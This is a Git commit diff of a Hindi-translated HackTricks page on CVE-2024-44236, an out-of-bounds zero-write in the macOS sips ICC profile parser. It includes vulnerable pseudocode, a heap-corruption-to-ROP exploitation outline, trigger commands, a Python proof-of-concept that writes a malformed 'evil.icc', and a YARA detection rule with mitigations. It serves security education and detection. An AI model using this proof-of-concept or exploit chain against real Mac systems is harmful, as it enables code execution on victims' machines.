maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips

Browse Source
This commit is contained in:
Translator 2025-07-30 04:26:40 +00:00
parent 6f4fb1b799
commit c5dde7f077
1 changed files with 70 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

96
src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md
View File

@ -4,50 +4,94 @@
## Overview ## Overview
Apple macOS Scriptable Image Processing System (`sips`) ICC प्रोफ़ाइल पार्सर (macOS 15.0.1, sips-307) में एक आउट-ऑफ-बाउंड्स लिखने की कमजोरी है जो `lutAToBType` (`mAB `) और `lutBToAType` (`mBA `) टैग में `offsetToCLUT` फ़ील्ड के अनुचित सत्यापन के कारण है। एक तैयार ICC फ़ाइल शून्य-लिखने को 16 बाइट्स तक हीप बफर के पार ट्रिगर कर सकती है, जिससे हीप मेटाडेटा या फ़ंक्शन पॉइंटर्स भ्रष्ट हो जाते हैं और मनमाने कोड निष्पादन की अनुमति मिलती है (CVE-2024-44236). Apple macOS **Scriptable Image Processing System** (`sips`) ICC प्रोफ़ाइल पार्सर (macOS 15.0.1, `sips-307`) में एक आउट-ऑफ-बाउंड्स **zero-write** भेद्यता एक हमलावर को हीप मेटाडेटा को भ्रष्ट करने और प्राइमिटिव को पूर्ण कोड-एक्ज़ेक्यूशन में बदलने की अनुमति देती है। बग `lutAToBType` (`mAB `) और `lutBToAType` (`mBA `) टैग के `offsetToCLUT` फ़ील्ड के हैंडलिंग में स्थित है। यदि हमलावर `offsetToCLUT == tagDataSize` सेट करते हैं, तो पार्सर **हीप बफर के अंत के 16 बाइट्स को मिटा देता है**। हीप स्प्रेइंग हमलावर को आवंटक संरचनाओं या C++ पॉइंटर्स को ज़ीरो-आउट करने की अनुमति देती है, जिन्हें बाद में डेरिफ़रेंस किया जाएगा, जिससे एक **arbitrary-write-to-exec** चेन (CVE-2024-44236, CVSS 7.8) उत्पन्न होती है।
> Apple ने macOS Sonoma 15.2 / Ventura 14.7.1 (30 अक्टूबर, 2024) में बग को पैच किया। एक दूसरा वेरिएंट (CVE-2025-24185) को 1 अप्रैल, 2025 को macOS 15.5 और iOS/iPadOS 18.5 में ठीक किया गया।
## Vulnerable Code ## Vulnerable Code
कमजोर फ़ंक्शन एक हमलावर-नियंत्रित ऑफसेट से शुरू होकर 16 बाइट्स को पढ़ता और शून्य करता है बिना यह सुनिश्चित किए कि यह आवंटित बफर के भीतर है:
```c ```c
// Pseudocode from sub_1000194D0 in sips-307 (macOS 15.0.1) // Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
for (i = offsetToCLUT; i < offsetToCLUT + 16; i++) { if (offsetToCLUT <= tagDataSize) {
if (i > numberOfInputChannels && buffer[i] != 0) // BAD ➜ zero 16 bytes starting *at* offsetToCLUT
buffer[i] = 0; for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
buffer[i] = 0; // no bounds check vs allocated size!
} }
``` ```
केवल एक जांच `offsetToCLUT <= totalDataLength` की जाती है। `offsetToCLUT == tagDataSize` सेट करके, लूप `buffer` के अंत के 16 बाइट्स तक इंडेक्स करता है, जिससे आस-पास के हीप मेटाडेटा को भ्रष्ट किया जाता है। ## Exploitation Steps
## शोषण के चरण 1. **एक दुर्भावनापूर्ण `.icc` प्रोफ़ाइल तैयार करें**
1. **दुष्ट `.icc` प्रोफ़ाइल तैयार करें:** * एक न्यूनतम ICC हेडर (`acsp`) सेट करें और एक `mAB ` (या `mBA `) टैग जोड़ें।
- ICC हेडर (128 बाइट्स) को `acsp` हस्ताक्षर और एकल `lutAToBType` या `lutBToAType` टैग प्रविष्टि के साथ बनाएं * टैग तालिका को इस तरह कॉन्फ़िगर करें कि **`offsetToCLUT` टैग आकार के बराबर हो** (`tagDataSize`)
- टैग तालिका में, `offsetToCLUT` को टैग के `size` (`tagDataSize`) के बराबर सेट करें। * हमलावर-नियंत्रित डेटा को टैग के ठीक बाद रखें ताकि 16 शून्य लेखन आवंटक मेटाडेटा के साथ ओवरलैप हो जाएं।
- हीप मेटाडेटा को ओवरराइट करने के लिए टैग डेटा ब्लॉक के तुरंत बाद हमलावर-नियंत्रित डेटा रखें।
2. **पार्सिंग को ट्रिगर करें:** 2. **प्रोफ़ाइल को छूने वाले किसी भी sips ऑपरेशन के साथ पार्सिंग को ट्रिगर करें**
```bash ```bash
sips --verifyColor malicious.icc # सत्यापन पथ (आउटपुट फ़ाइल की आवश्यकता नहीं)
sips --verifyColor evil.icc
# या जब प्रोफ़ाइल को एम्बेड करने वाली छवियों को परिवर्तित करते समय अप्रत्यक्ष रूप से
sips -s format png payload.jpg --out out.png
``` ```
3. **हीप मेटाडेटा भ्रष्टाचार:** OOB ज़ीरो-लिखाई आवंटक मेटाडेटा या आस-पास के पॉइंटर्स को ओवरराइट करती है, जिससे हमलावर को नियंत्रण प्रवाह को हाईजैक करने और `sips` प्रक्रिया के संदर्भ में मनमाना कोड निष्पादन प्राप्त करने की अनुमति मिलती है। 3. **हीप मेटाडेटा भ्रष्टाचार ➜ मनमाना लेखन ➜ ROP**
Apple के डिफ़ॉल्ट **`nano_zone` आवंटक** पर, 16-बाइट स्लॉट के लिए मेटाडेटा **सही तरीके से संरेखित 0x1000 स्लैब के तुरंत बाद** रहता है। ऐसे स्लैब के अंत में प्रोफ़ाइल का टैग रखकर, 16 शून्य-लेखन `meta->slot_B` को क्लॉबर कर देते हैं। एक बाद के `free` के बाद, विषाक्त पॉइंटर को छोटे मुक्त सूची में कतारबद्ध किया जाता है, जिससे हमलावर को **एक मनमाने पते पर एक नकली ऑब्जेक्ट आवंटित करने** और sips द्वारा उपयोग किए जाने वाले C++ vtable पॉइंटर को ओवरराइट करने की अनुमति मिलती है, अंततः निष्पादन को दुर्भावनापूर्ण ICC बफर में संग्रहीत ROP श्रृंखला पर पिवट करते हैं।
### त्वरित PoC जनरेटर (Python 3)
```python
#!/usr/bin/env python3
import struct, sys
HDR = b'acsp'.ljust(128, b'\0') # ICC header (magic + padding)
TAGS = [(b'mAB ', 132, 52)] # one tag directly after header
profile = HDR
profile += struct.pack('>I', len(TAGS)) # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)
mab = bytearray(52) # tag payload (52 bytes)
struct.pack_into('>I', mab, 44, 52) # offsetToCLUT = size (OOB start)
profile += mab
open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))
```
### YARA पहचान नियम
```yara
rule ICC_mAB_offsetToCLUT_anomaly
{
meta:
description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
author = "HackTricks"
strings:
$magic = { 61 63 73 70 } // 'acsp'
$mab = { 6D 41 42 20 } // 'mAB '
$mba = { 6D 42 41 20 } // 'mBA '
condition:
$magic at 0 and
for any i in (0 .. 10): // up to 10 tags
(
($mab at 132 + 12*i or $mba at 132 + 12*i) and
uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size
)
}
```
## प्रभाव ## प्रभाव
सफल शोषण का परिणाम macOS सिस्टम पर उपयोगकर्ता विशेषाधिकार पर दूरस्थ मनमाना कोड निष्पादन होता है जो कमजोर `sips` उपयोगिता चला रहा है। एक तैयार ICC प्रोफ़ाइल को खोलने या संसाधित करने से दूरस्थ **मनमाना कोड निष्पादन** होता है जो उपयोगकर्ता के संदर्भ में होता है (पूर्वावलोकन, क्विकलुक, सफारी छवि रेंडरिंग, मेल अटैचमेंट, आदि), गेटकीपर को बायपास करते हुए क्योंकि प्रोफ़ाइल को अन्यथा निर्दोष छवियों (PNG/JPEG/TIFF) के अंदर एम्बेड किया जा सकता है।
## पहचान ## पहचान और शमन
- सामान्य प्रोटोकॉल (FTP, HTTP/S, IMAP, SMB, NFS, SMTP) पर फ़ाइल ट्रांसफर की निगरानी करें। * **पैच करें!** सुनिश्चित करें कि होस्ट macOS ≥ 15.2 / 14.7.1 (या iOS/iPadOS ≥ 18.1) चला रहा है।
- हस्ताक्षर `acsp` के साथ स्थानांतरित फ़ाइलों का निरीक्षण करें। * ईमेल गेटवे और EDR समाधानों पर ऊपर दिए गए YARA नियम को लागू करें।
- प्रत्येक `mAB ` या `mBA ` टैग के लिए, सत्यापित करें कि `Offset to CLUT` फ़ील्ड `Tag data size` के बराबर है। * अविश्वसनीय फ़ाइलों पर आगे की प्रक्रिया से पहले `exiftool -icc_profile= -overwrite_original <file>` के साथ एम्बेडेड ICC प्रोफ़ाइल को स्ट्रिप या सैनीटाइज करें।
- यदि यह स्थिति पूरी होती है तो इसे संदिग्ध के रूप में चिह्नित करें। * अज्ञात सामग्री का विश्लेषण करते समय पूर्वावलोकन/क्विकलुक को "पारदर्शिता और आधुनिकीकरण" VMs के अंदर सैंडबॉक्स में चलाकर मजबूत करें।
* DFIR के लिए, एकीकृत लॉग में सैंडबॉक्स ऐप्स द्वारा `sips --verifyColor` या `ColorSync` पुस्तकालय लोड के हाल के निष्पादन की तलाश करें।
## संदर्भ ## संदर्भ
- ZDI ब्लॉग: CVE-2024-44236: Apple macOS sips Utility में दूरस्थ कोड निष्पादन भेद्यता * Trend Micro Zero Day Initiative सलाह ZDI-24-1445 “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)”
https://www.thezdi.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
- Apple अक्टूबर 2024 सुरक्षा अपडेट (CVE-2024-44236 पैच शिपिंग) * Apple सुरक्षा अपडेट HT213981 “macOS Sonoma 15.2 की सुरक्षा सामग्री के बारे में”
https://support.apple.com/en-us/121564 https://support.apple.com/en-us/HT213981
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}